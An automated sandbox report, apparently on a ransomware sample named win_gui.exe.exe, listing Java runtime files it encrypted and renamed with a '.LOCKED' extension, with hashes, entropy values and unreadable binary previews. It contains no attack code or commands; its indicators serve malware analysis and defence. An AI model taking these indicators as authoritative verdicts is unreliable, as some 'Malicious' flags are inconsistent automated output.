                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799456
                                Entropy (8bit):7.340721640492317
                                Encrypted:false
                                SSDEEP:12288:hmPXqcI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rlVInor6e97oOXkGz:qS4oIb4SfHbH0b+ejrlLrFWh2Q4R
                                MD5:E27973C6ED8F58C532486483422363B7
                                SHA1:8F23C8E045D92D9E0C57AB077699EBBDB0C1AD96
                                SHA-256:D4F9AEA50E85204290C6CDD1400C40707781CF491B64EF883CABF0FFC9855DE6
                                SHA-512:FCA98EB50C2CD3FB8815AE5D2A2D26F84AFE24FA9B3D508338A13461D200F497772D55A9D356883D941016D1C134468C37798ADC6A3D30FC45F5B8234729A966
                                Malicious:false
                                Preview:!...^.pO.M....t)Js....^....Gv.9w..T..c....]......'.L*.g?.QY?..b....<..u@B..l ...(..Z..&&.xk.Cr.../..:..A..u[..P.V..be{.))QV.....]Z..+...k.......ho./.N.J'.....3..e..yH...d.....w{;.......$...Z|h*..P.m.S./.v.g..mf....Z...ea.N..{...acfx...9.FKw..#..wq...p^:....;pr..P._.rW....u:.Ev2.[n.:x&..J5^"r.d.#Y#.,...x..mXU.wk.}k.........nV..Uvl....,_..wgS!...m.Z.n...s.......9Le`.......QFR.3,....8n..T2.....B....i...f.."...].w..*...Y.z.6....C(<.........D. ..D/..n5...A...1h.(...72...J...~.m.-.......J....._|.0.....V......I.).vm...s+..V..H........r..3.{.m.8.......my=&Y.~H...g.....O..SO..3.{.q>..3..Y..L\.@p.K.n..4.-...N=7.F.1z.....~..3x.n.!K........M*.:.<.....[...C.X.9..0.........y.\.....Z.......m>5g.9..[....7......*Z9.g7U.R..j......g.Mt...1.'Dt...A..}sc//.WY.;Z.+.M.^..[B....>.K.g.)..h...@..._X.yB7.V...:._...b.K...Y....J).-.M[..L.G].O..!...........I..[...n..l..-.m=.f-.....'FL......j%..`..T...t....@.......'0.>..K...Y...k.G.ID....Q.%..4..=!.U...4qT.........

                                C:\Program Files (x86)\java\jre-1.8\bin\hprof.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):140000
                                Entropy (8bit):7.998696269920782
                                Encrypted:true
                                SSDEEP:3072:SoWDDUrfObRUAJvxeCz4Sx9Gpl/5XTaErOSObphuxRo:eDArOVNxe9S4XdmpkxRo
                                MD5:E2837BB33BA9ECB68329218693F681A4
                                SHA1:09BDDD4A37A499911D87CED56796B9BD4CE511E7
                                SHA-256:0E22B639B6FA3436B3BEB12469094C920F7DA3220161FC5825BD7F01C60DBBAC
                                SHA-512:1DBC132BE7EF6DD22E30A5C2758EC1230F585DECAA6008BC699909EB6AAB8C36F5190D0AF2CDE2F74153DE96ECAE4DEAB380F2B8CB6A20147E92A425C676864B
                                Malicious:true
                                Preview:!.h&&.J....}.l0.-^;...:!w..V.nzD......f..w8A..ZX.r-!...<,.4U..UF.S=...7P..Z;.n..@.\QP..o<...#....a..q n>.Q.v.".....xX.2$'.......22.,.U[?.RR.!I..@....42..4.T&..{.a........9...5..C.H.'.[..z.........._d^...dDk...,j.<.7.nU|1<..b..K..V.n......{..`b"9(_..VSxm..0..3.!&...nm..4.l.....UX(..9....{x[..G.....4..S~..d...T.:.....&....N.d.0....i.... ..P-.q..I*..T.6...:..2b.K...^.uE.S.....q.:KIk.%....D.:.{.M@H.A.3.lz..i..l......b....LbYj.,{0C.nX.s...d...{S...~....2tiu_......L.[.y...;dZ..L.R.....&.<.:=z.0..'....vb.?'.e...\]...I.M...EE.$.|.1J..[..R.U...)R9!t..h......~...<...3..g....Di:Y&f.....<._X2.......t[P.".....x..B.'%..7z.<...t.=.....6.5...@Uk./.._0cL.@.....HQ..X...Na...8{..:,..l..u...x..2.....[."IyY....Pq..?..0.b...\U2..x<|........{+.X|....1...P...hX...C6".F..$6.a.....j....g...6..V....-.C.6.....F%..%.~\ch..r.........I....H..UF..G(.qH.....SL...... .k.J......5.dKT...."=...[.B.n.Vs..\..3].....PM....d%I4.8....X...........]N.^..).r=X\.>...YG.k.. ..hN.C.v..$

                                C:\Program Files (x86)\java\jre-1.8\bin\instrument.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176864
                                Entropy (8bit):7.999007606637684
                                Encrypted:true
                                SSDEEP:3072:5F5NcfJ3HMN+07f4iMbFysaWChjYhh2MH+8mEQzNfCddWnPj6zpNs4vs1kWt:MRMQ24iaaZhUhhFe5OinGzXsss1kWt
                                MD5:29C410F21DC6E44873C37C7DFE8F9D87
                                SHA1:716C856419113556136C3786E2BD6F6F2EA01786
                                SHA-256:3C9F0E28E97772A54A7CAED26AD8D45743F4AEA2C87B71E7A59D3C3E4CAB3F7B
                                SHA-512:E6667C704E9166ACABB04963C8E16922515FB6B298D508266FF592E909F9ACAECBFE1C8A6E57D55301F2958E67E1D7226A0CA69784A267C60B62CDEEBAA46D78
                                Malicious:true
                                Preview:.2U}.LJ=7.+.C.N...4....iV......y...M..{...e..x.....s.....h.\..T6......I.>~.<9..l.>.N.R...Uk.A].5...#!.D..H..:....v..H._A.7...&.h.=*....j.4">3.......[......s3...3...m....V;!....!...%/...P.].oz0.Wd=..?.'..EjF......"....H....._*8.@.Za..^.r.3..-..;..!<.Y7.O......=...L...i..8...+&09O..e....%.(..#K...q._ ....oz1..w...A5..ll[~+...O......~..?Z8...)p.q..(2..m.aD.*.J..s9l.6....k...@....2...H..........M:..?...s...:..u.....W[.i?.6..a&<U.#P.........+84.....?....&.E..[.N...".K0..&.;-.WM.S.m...].fv..Q...V............9....-hB....*S..`[YI.{.~Q.zRc..e..(.....#sp..a..].......rtNS.....8....z.a$.....Jp.Fv..R"r........V"..............%.p..m..>Zi/.O.E_..)'.q...Zf..`....2..[.|..+.O.V..H..s.C. .:..4;...........u........^=.+.o.o..M;5....0.....</=.....u&....Y.p.pp.OL.=....,.Q}u.".....|..z....Ed...U.*`.e1g_*.O.F.,L.7..^.AdR....R....6N..ri.4...3.Y....<<.#......g.(.JY..]....T..npA......c/.x.nM...t....d..........N7.5..F.N..S...t{....=.-..u..6..f..HB.Y..UTU

                                C:\Program Files (x86)\java\jre-1.8\bin\j2gss.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):44768
                                Entropy (8bit):7.995653488210379
                                Encrypted:true
                                SSDEEP:768:ZWSKLK4ZXF1llXqyfhAP4N2PVayHnqCOveCMREZlpeIBD9vewoxYI8PTXnoJjfTL:ZWdLZll6ChE3zCMREZnBxe9x18LodLhB
                                MD5:3E4840663FE8DC449685AD43198DB4D8
                                SHA1:CFEC49F8F56306981B4F48C3F6E133870C21A29A
                                SHA-256:373D4578117EA9C3AC96128CFC4E989447CB0E663125DA35425D9A90C7A4213C
                                SHA-512:85984AEB17D10D3E976C9DA8437FC59623109212C5BC32501B35ECFF8927B0CC87EE1324DD772CAAB2D2F5C8617800B97A96C7B38C867FFDE3434C14B9C1E061
                                Malicious:true
                                Preview:l&.n<i...-..l6%..N...NB..................I...7-....}.vNe.o...iN.Gf..F..z.#M ...aGM........k.<b4!6.../.....[...u.(...j..........4(..(.=...Bh....ix]T.>.....9.T..<..~R.T2.D2.2.,..h1...Q].N..;.X.x..f.m.....q0..j.....e...i;Z.....H...MrQ;....5.#.....X..i.Z.wrn[.l..c!x.7_.H7.!'...."R.-..(..6.J......=a....w..dV..V<..|f..Mv..f.=..'..M.=...((....1.$..u#.0HL...T2....p.J%:z...c.m..u. ......2.D.Wc:....i..tV{0/.L.b.(....`.6?.l..,..e..e.8,..-....Q0..I..p!.P<..8.T.FIC..../..SQ".3`@L.g5.Pv.=P..0.K.$...h}.._).M.. ..T...~....o".'r<....4..q..: .kj#(..=n......p.hi.Zt.....(."..V..H..}].F......g. I....;..aDF..wN.;.O...;.~..Ooh....R..Cw....).D...&P2&.1'7]..N.a....~...~....O#`.............'.>.f:1....*.@,...K?....E.5vX..6..y. ..M.66.........4..........i'pR...]..w...uyz.....I.'e.n.J&K..T.A;k?I@i.L.........Hw.8].....y..@.....+S8.?v>..>...P.P....M...T.O........N.o..|.T..5......#..g .^.K.9...P....2}.,._?...%..;...IlkY.)W...d.^....>}.C.....z,.w.~..i.......0..Z.c..

                                C:\Program Files (x86)\java\jre-1.8\bin\j2pcsc.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23776
                                Entropy (8bit):7.9922148082497255
                                Encrypted:true
                                SSDEEP:384:WlkwQuzC+WkZpvp3RRZGpB8H3jfUOHUmeS0u9gsH7HoiVmcsHfgSursGxhsUr/yw:sewVWkdBO8UBmeA9pDViqsgn/yw
                                MD5:B6D234B2E7339689421F21270EBC54F9
                                SHA1:12C11EAF65A44E36274FE19118B8F3D19C035762
                                SHA-256:6D68E42CB06FEFF125131FB99401E6C1C5B13C04B2B28BD471DA831AFF97D079
                                SHA-512:B052F8F2C0E0CEFA1D0FC0B8719DC84E62FEEB63F49A25298EE87F21ACEBD5EDC4E92A45D099383209149214D60A9AADB50736FDD777DA536A76C5F401DB1085
                                Malicious:true
                                Preview:.H..x......'.5....ih.z.X`.'nV=cH..9....xM....s....z.pU....G. K$>..........?s>..F...P..j=g.).I..?T{.....K.....~.1JI..O.d.%.gW./..........LK..6.#..}..7E.sN.6..~..r.n...<..WP.B..H...@.E.s0zYk|+./.........c....Dp.....s....[#.>......8..4..#.PR.....$.U.F.-6.y&B.....C/.m.O...WM..j^`......6.i~.t.j..#A.vZ..kS8...F.1...Q....w~......k6......bsP(zJ'H^...$"VX..P.69..N3...O..Y.V.*....(..b.g..&.^.P.V.....vs..F...#.q.h.L...{...?&.F1y...b:..*....DSt..S..$.5|........L....[.C.f. ?.$"..={g....E........2...Z..[.,..N........rw..r..o..j.7..........YAXZ....%t.....EP..D..w.$.]../J..."....G}4QN........x\..8i..v..g.L....+.e..X[ZO.E..*O..7..%R...5.%...eR 8_..B......S51..U,Y..[..*..e.QiV*..."U.f}.......b....Bkw.$.$z.tM....Roc.|..Ys...J..2..~..^.\_..t.+R.O.|...Mlz.J...p1.Z+......pc.h..E......I...w.....@......x.R.b..~2P96..UjG...o.H...x.PE..d......h...n..........@..(BQ.=3.O.!..qe.'...<.:..te.H.j.....4FdY>.S(..;.]D.!.u3X...9uwd...{.....Lq.-..BvX..lA.I_W.I......g.F..z....u;h`.p..k.

                                C:\Program Files (x86)\java\jre-1.8\bin\j2pkcs11.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):61152
                                Entropy (8bit):7.996887697081187
                                Encrypted:true
                                SSDEEP:1536:p1nfREn1N3KE8qQ1/hi+Vj1qMFhmX1awWkwH2MyjGtLMyf2KVXb22F:XJEn1dK3hiEjcMjwaKpGtZfLVBF
                                MD5:821B20511CFB706F9119A745582B4FBA
                                SHA1:225EFB39427DC70C1659D4057AE02FC749E57240
                                SHA-256:840A7B020C696C2EB272387E05BC7A91F5876D285A07A333C52535E7A8664400
                                SHA-512:608E5459D94883F56FE3D976F5D02A35A9B8B241B07299C7DAC50F6AAAB2386FAD9D8418C64BFE376EE7D63048F413111504B816BFA4B1C3D95FC81E85679113
                                Malicious:true
                                Preview:..).)..$9....."..K.+..KbeR."*7.^r...,.Jh.1._.?5.:.p..~\..Vt[...;.Y.y..{.t..=......a.U.q.KY....[...[c4.q.....5..].aT.y.[{..:.y../......!.$..e.@......!.Xo..S......G...M...{......I..Rh..'bT.......8.sH.X+.d.0..4`....<..[....AIm.4..*....7.)y.....W"/d{Ds.....'.K.r.).....Kr2..P.l.SmC8^....g....e6.M.b,.J.H.51q{.....q.F........O...".X..z......7...o...E..%Q.......n.>....9 ....X..)..q[X.IV=.a..qEW.3w._...1...^E.:....\YF.6H.pE....{........K.Y...tO.....g..".U.aX;..)..m..%.>QN.jbN53`M9v~u}............U.B..A/....N...FHxiT.N....X..E}.....v.n.].f..+.?......C.j...X..Zb...K9......m.0{.&........4..g..-g..:K.I..PJ ..".Lg..;9...G.j0i..Ap.....Y.4...$L._.....Y.k..#8NJ......{...:s^.l...y.....J?j......X....:x.D....<...b.......x~{*..s.....#.5..=1p..j.........>sP........Bd.....C.....o.+X.T.....F.t... .wK...<WA..D....]YP..j..{..y._D..[.^..q."..}...\a.....;W>..5....*...Rg..........j]......F.$17.p.9!.a..3....5.e..\...._.?E...q..j.>'(.S-.r.....5R5..;.8.B0>.....".~

                                C:\Program Files (x86)\java\jre-1.8\bin\jaas_nt.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):26336
                                Entropy (8bit):7.992462693697551
                                Encrypted:true
                                SSDEEP:384:vzw6j6TQh1+bKqKPD3xZZmNxRGHezZrnE/ggrMVRpgGYJMamMFjA2zBn1eabh+Vm:bZj6kOmb3TEXRG8g/lrMLydFj1dn8OP
                                MD5:61E131A98518C842CF5CCB46F011987D
                                SHA1:17DC307278E4C34D6CE74B8D84144D411F08D2F7
                                SHA-256:FEE27652166F1621BE86E02EEC1EDD178D2878CF7C8080D9001CC4618B68FFB0
                                SHA-512:930421F79370D0F971C31684FA72604F01BFC6A2F15DF5B8A49B875E1235D587206E592FF89AFDD7FADAE9399CC60CC28F2492147F564BF86E8BC40E69420624
                                Malicious:true
                                Preview:c4.s.Z.S.D..O..|.w.......:..{..%.K..2...wqp.^w+.C..N...?rhz.....K.Z.a....p..........RE.........X..d./2..v.p...c..4.p.......65...N.&.......$+b....C.....y7....O.l.G.+g....},4.......&.. .0dY1I.YJ..\..".1.._\2O.*._&.Z......6v....g%.......n..dz%.S7...6e.....5...]..Yl..#?f9j...}....(u.+..3...,[.F...-.....W.Y ...Hi.....).'.(6....I.... w...B J.z.7.@wI...UQ...3k....A..c<n.(d.1y.o..]..i$...a....[/.|..F..HoH`...1.)....98....0.5...ue%.A..W...$tb.Ro4.....Z.dB/.nw....nU.........:4h.......E.!....Z...R...a...0..+......m.}.UC.`..D..Y.d.L.2..?...!.........X.B.@+0O7zm<f.P.XF..}.b.k.T..a....y...Y....C.Nv..=B..P..i.,...@........t.....k..!...\F..v..!-..Q.W......u...<........C<..,.rMs.A..!.f..Q.@)..}..%.|44....:..S...tD~.8.N.C.G....Y.....]"..9..Mm.o\.|u.Sc.e..?.#}k$....5v......N]..../..K....a.H.oJ.1.c..f..'...<..z.2Fg"a\].~.T....P.:BF.gC...5..w9vI .&^.......k.+iA....7....4.9D..o...*T......C\.Y.Z.On0...wr......o...8U5.__.MDu$/*Z.....]..c.d.

                                C:\Program Files (x86)\java\jre-1.8\bin\wsdetect.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):192736
                                Entropy (8bit):7.9991235609400215
                                Encrypted:true
                                SSDEEP:3072:2+IMWx2NC/0EUUqQpsLC3quUOvMXCXxS5TuItfvyRon07NOr84MO5pSd7pEUHJsw:NqICzUIpscquU6xSFuItbKuMO5gdF5JF
                                MD5:F620692E971418D073313CE39A7C0456
                                SHA1:15AE28BE6E70B25DFC2B206C770A23C463813F21
                                SHA-256:6C024BD7D97651B2BC86F8BF30A3849677F3D1E09B9171E36079C207DBC9B581
                                SHA-512:B1B0D00B9DD40B3FE6EF8FA9A0B5DCD94E5AECC31ABEB5DE2716FE43DC95694FDFFAABDEE6CA2134D66577CE01337C8E9BC7D05C97ABE1539CBD79F0003EED77
                                Malicious:true
                                Preview:|..>.H..y...mP.6.....n<..h...5Q..+X..wU...{Z.;.7.......I....K.....C%.<u....`.w..a...v.......5[..........4..S.^........G......ROX.p....FY..d..z...=\.]W....4.[...B'"`Z..>;.....R..\~6 ..70.....*vX.iAq.O.oE...$.b}.v.;-....d|[..lv.....Kqv....e....n.....:."..CL!.."+.1.{4....J.K...,.R...&I|.F..!.t......w-.,.J..?j......R55..r.;...&rc.>......v.w.h..._........]XO..k&....W.aon........Lq.$..BF.=.`.2.'X....%.]|..K..c..cn...B..,...._..j...y{E..........F.......dO?..f.I..zL..p.&].%1)C...fYp.a8.~.e..C.B@.9._.....WXU-.&..W..t.bgC!_.R.{..;..C.y..e..u.f...o....(....&..%....T-..R.....v.....5..YA..|8...B...Q........%V.....U..f..Nh..)/.!......o'.LRxL.3sR....&"9.....8|=..#$.....3J.4W....."......V.....#.......*.J+H].EH..P..kD\.yL........V.........4=?.E..S...)7.~..Lg./).........& ..\.$b..*.sOn.@.<...k...4.|W..Jb8.."o_2I..N..:...G..Dg:.Rc4.rV T........_....Y..h.NLj..Mb...$."-......?..<A..N"/0...j.#.a.s.f. .-..i....x..f]8......g...7..t-../.....<I.1.....W-.J...\...

                                C:\Program Files (x86)\java\jre-1.8\bin\zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):82144
                                Entropy (8bit):7.997391316758768
                                Encrypted:true
                                SSDEEP:1536:iGS2PoB/QFGULWe54Z5OSK5tHorWKVu0FRyyJOc+3XSQ3Gy/ukT0IT:B5oB4gQX54ZYmWKkSRyuOcuHx
                                MD5:A6FC0E358F2690267B6692FADD330CB5
                                SHA1:88F0D41AF9914F48BD0A3A167CB56819385498B3
                                SHA-256:A398C30B6DE0951ACE6DB525DEA1F7BE70BDC8DB93BC02680D2EA8654ED6F8EF
                                SHA-512:5C19598C0FCDDAE3DC6598A03B262F862AE195AEFBE9A054EB88EF1C75833FAFD73D1C587555A5FE6D06376F91574F1CCBAD57A67069AC7DBEF02C9CD33B12B6
                                Malicious:true
                                Preview:uS..i\.h}-..]......%L.y..f...'.%..A].b..I..)0..'..x...(../........._#x..2]..4.1..M..3*(...V..@E......[.^G.......K<....Tbh..j>.........=(*&4p.F.LAcgW.T..f.....#...t..2..S...]...,...<2..4V...2t.S.i.22..$d.8[./6...@|...y.u.&..bJ....4.n......f.......;.e....k4S.~\.v:......#:..:.}j..\.:..F.l.P.}.@3<..K....U../cv....r..W..S.}..BA...5.._...[...x.mgs./V..%.TB..a.vV....?E}R..gKh..Z.0@.X.l...E.^...\.E..!+...l!2t...0.;M..%.1....*..E....voz...eD(..w.....HH.q.q..7y...ZH=...`X.P!...25h....Z\C....G.u..K...MM.X.[W..fw.3...k?....o.Y.......~4...M......R...6c..w..-v....=.&E...h..(.w\Gi.|.....\GJ;....$.*.w.$.e....hd.UX.....y.,rv._c.QC...[...A...g....$..I@\.....$]..xb...!...b..G\.~Ww.n...@.b.y....Cb.A..R..@.},a..Z!j..s....<........f9.B.(..\&qa...q.+2T..-..>...+..X.!P5Q..37.~.(.....f9.@..%..D....Z.8.tCg....<s.A.Ah.FQ.X?\.'(........$...K..uA.W.O..%.pnt1i.}v..F..M.z..d..)R.b.V........~Z........."..S.l..?W6@^1z..M......_...79U..S..B..uf+#..'.?...4Z."..v..6E..4m...g9?.

                                C:\Program Files (x86)\java\jre-1.8\lib\accessibility.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):757
                                Entropy (8bit):7.679358658025262
                                Encrypted:false
                                SSDEEP:12:AazVw3Li1vQqOLHD5XsYCWw14eNR1PcrSOGJ9fuyAWKj0hOJNuauDZMK5mg/2lWO:A+WuKjj5z/wpDyYPGTNj0hOHAVMJg6WO
                                MD5:CAC5A4971CCE9C105EED85A29EA39C34
                                SHA1:9B06873136DB07A8B926F2665471FA8C4D8CB66C
                                SHA-256:9B171B21D67172A3206BAEBC55AB8740140527A28F27EB4E7BF2CD091DFD3092
                                SHA-512:9F7F080C51E5C69167878E8D99EB0A9E9C7B0740305F94AC9CAF58D0A0A507CA6F58262DAF48AD7FF5E63420BF31977E473C9E819C98A0EC11BECA37C8F13F91
                                Malicious:false
                                Preview:.3.v....Q....@.5.{M..5|..M.7a.....;*.......d...Pp.@).E....'..VK".-..K+.....G..Q'.d....L.}U..*..g.....zz...E.."-.#...~....I{#..s..t!So..{8....}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N....w...N..G....~u...H_Q.`U.e.}.IzM....................fk.W...f

                                C:\Program Files (x86)\java\jre-1.8\lib\calendars.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2090
                                Entropy (8bit):7.908229248728333
                                Encrypted:false
                                SSDEEP:48:5IUXamnvvC4wBGsirnKBpY4UiXjTARxwTwV2Lp8cx/WyYu+MAVMJg6Tz:VpZwgsirKERiXvAROzrxevuAVOz
                                MD5:2DA67F3B772A06B2C0BB4D8929E8B84B
                                SHA1:8EA26C8DFC918E74B0D1B02FF3B407DFEC3C87EC
                                SHA-256:8D7AD3F3D22C3B2A7F924C60492BEEC5CCEFBCC39142FF9099CF2D3D028FA1A6
                                SHA-512:29BBFAD49C22B08176D82E0706F5D6C5E10478B9402996EFD45A3D7FC5654B97C884012D37DBD6F16B7C2C6E440C2AC7497E1B246B2625E537F3F43F1841112C
                                Malicious:false
                                Preview:q.w....t./]Hn-"6#.Y..E..r..$..Uy..W|......L.p?...*.... p...-..-f.\._.g.~c...^...?.2C.#......3..OP...(j.W....beu..=.e..).z2Q'..y^.w4. ..q.._V...q.?.L}'...@.f.).../......}...l...dXd~B.@I...O.Ou5........1i3.....E.$.....E....F.......\$_1.X.<.F.O2....rADH=...w......%......rX..aDH..(.....e|..^u.1.....?.....sN.....W.....n......0.....^..i.....:...S1.....kP.........2..z.{A....I.&,k.7..cpH!f.z..Yf.......Jq.V.OJY...........6...*3!.6...~....u.A.s.....!X..."...G..;..#.8...^.6....6...^..BPoTpb3.M1....&.....=.o....K......Q.=..o...........;^`...i...A..b3..pW.2cS.n..|...GS.2+....s....r..o. ..(w...=.....6._.Rk.r..|.c..Ro..L...a;$...^.z~.....V.?..hc=P.m.y.....D...%...EU.....3.:j.......B9.9..\q/`.:...e.........g.L4:.t.[.sP....v1q.`n.CGk.?'.g.@".`rD....5...&....F{Tv.6p.#. .....R....6._he...s....n3r\....gU......T.e..+...)...h....78lSqI...y.Pj.F.. ..:...v. .|..t.#..$4../~*.".+..LR'.8.6.H.Bj.:..r.....].....].s...-$.....1..a.3w..5v.....W|E<....Z.f..^Bc.Y._y\.98Y$-.

                                C:\Program Files (x86)\java\jre-1.8\lib\charsets.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3040472
                                Entropy (8bit):7.181838696273676
                                Encrypted:false
                                SSDEEP:49152:taAiTtSBz1nEJOOUJbn2RZQVPxS7+EXdnvv8/2fo27:taAiJmzNzt72PQG3n3s2f
                                MD5:EE701AFBF3468FDC335F378E5070D004
                                SHA1:D04600DEC7FAD6636FDF6E5B4DB9E8E40270F227
                                SHA-256:41DDABA0BEC5EFCE33250AD8500C43EECCCF6F747F82DB209C3C2E4B92F39718
                                SHA-512:8657353BE742B3EB2B724FEF3B18E8611367B9615593BE891B84C292D90BE46EDDA3CF7ACF230A35A7D14916626C14D3AE0E9408384ED3A67FE96832A0E9BBD8
                                Malicious:false
                                Preview:...7\*(.i.I..^.A9"I...(....+\......D......S.e.......\!.9X.-..!u..j+5.......W.Q....n.....b. ...7."...A..*.}..z'a.<...~.~q..H.....T_s.6].{.P.#...."..>.|y..X..|a..k..`...pz...d&v..C..'...{D....V.HN.....W<..H'...{...."I...;..`t.c".....m....+.Q..~..]./\l.pE;A?..O....m.X#3e.H._O...Ap6:!r...+.lM.;K,...q..j....+.N.....N.!...A.......#.hE...U...H........1...X0.7.g.f....B...cp.-.V{...}.<....^.rM}?-*...,n........7..H.V.C...%.H..8.Dd.}........'..6..h..OW...V(.....f...`.....9.}.(!.%..J..p..#......[..........."...#.5.I.....d..~.v..O.9.(..m.fT3:........L.....z@@.C...%.1._.*_+;..<.:.f...q.'~.r.D0......;.....O..C.[.....cM...$.N.kwS.An5.dr.OR.^..q............d8W.P.?.0..x.R..Wm>.!.....a.JxX.".,....h..WV.F ...I8......N..O.?V.....H[o...0KR.o.d\...2..f...N.@.r\.4..!..o....b...9.e......@@.............Br..p..%q..E..I..q..Ee.;......J.;.....>.7$7.P...a.U..Un\MR....{i#a.`...Q|..w@.....8.F...^..l1E..y<..V.j.wW...C..q..A....l.U.ea-....TK...C..uZ.$...qE.7..l%..%...

                                C:\Program Files (x86)\java\jre-1.8\lib\classlist.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):84963
                                Entropy (8bit):7.997642145601273
                                Encrypted:true
                                SSDEEP:1536:pW3h/t8bGwU7Wu/z70dnDU7l3Yxz8TilOcTAArVKSoyje6YJsK4XFYB:Q3h/t847VLYpU5384aTrrf1VE
                                MD5:FE0AB951DB91111880CEF95179F01CD3
                                SHA1:0C7DFA136D0E935B9148DE7F92B1CDCA76B8472B
                                SHA-256:C7167DFACE786CE2E45F5D667283B977DBF058CBF0437F3A411E80447720E2ED
                                SHA-512:9A36CB05303B2C608C9D0989EE19D72B0A18D3C67A95BA777D5DECBD3AEEF1EA888EB8CD3A2E96E62427968238891B0D94080283CBB9C6C702073FDAD272D704
                                Malicious:true
                                Preview:.V......e`.B....P]Fd..u..T.;"...mK.V.>k...n......N_..j.....J.w..p.B`%.k~Rg.......h....1....~.|... ..d.*..Y...V.....k7{...uy.r*ey.'0..#.i...aTQ.-vC..ew.....2.D!...k..j2...k.........*.....Z._X..xE..0.....~.2Q.S.%&..,K.'E.{....}..K..x....5.;...%%..G%..c.U...W.{..[.P.DW....25.6Z..j....n....C.2.l.aP-.i..P.U.F.[jT..G.....T*obe.,1....C.K.u .P.../Z'.*.SQ~...._:.^.S.g....vQm_.?sd...x.....F.1......Q.h$U.8..*...t....+n..l......A.%d..FN.^y.....EF..?.Lo...kj..)...(.Fy3....y7_...EY]..N{...N..&@.......;...._k........7.1...E..W7..,6.;.T..~.Q.).W..2..%....z8[D.(q.w.!7!....+.+<H>g#..*O...?.'A.(...x..@......<L..qG.z.;\..J.D......P.>>.+-..*..FS..;....fyeP.;......7.#....hF..R.v..;..`.....g.]..c(..,'.{.1.........LA.....@....v.F.b..z..vK.c&..H...1.d\l.zN....7l6.jJ...j^S.ZoA....jC..S.2..o....x.Q.H9.sMx......WQ.vI.g9.f..9ck.S.../...]..u..L=....r..uso.......m.".sM.o/9-S}..r..H.X...'....:Q.XW....l..Kp.j*..!..^..n.{.`.t _(.....}...j.......A.....jgEZ6Z.u.0...HV..[a.m.....

                                C:\Program Files (x86)\java\jre-1.8\lib\content-types.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6156
                                Entropy (8bit):7.970817282685435
                                Encrypted:false
                                SSDEEP:192:DOrkxXJXnvkM0fKeRZQVe8q2PRGI+xDD2+VOu:qreXJXXyQk8qps+VOu
                                MD5:E72DCB85914526F307FBFF100CC4FEB7
                                SHA1:810AF6545230655479D3038BE5DDF30139C16E6D
                                SHA-256:75B2100934A14590745F386F7602F404737C413D22EE4BA0D4BAC430C4FA4D76
                                SHA-512:43DEEE0DE646DD836DEB63A40B0B66EDD79D3A074ABD8C7896C32CB182E1417120FA69AB6DEA4119A51BFCFFE513FB4450FB1770AA42389B3DDAD7EE68C8770C
                                Malicious:false
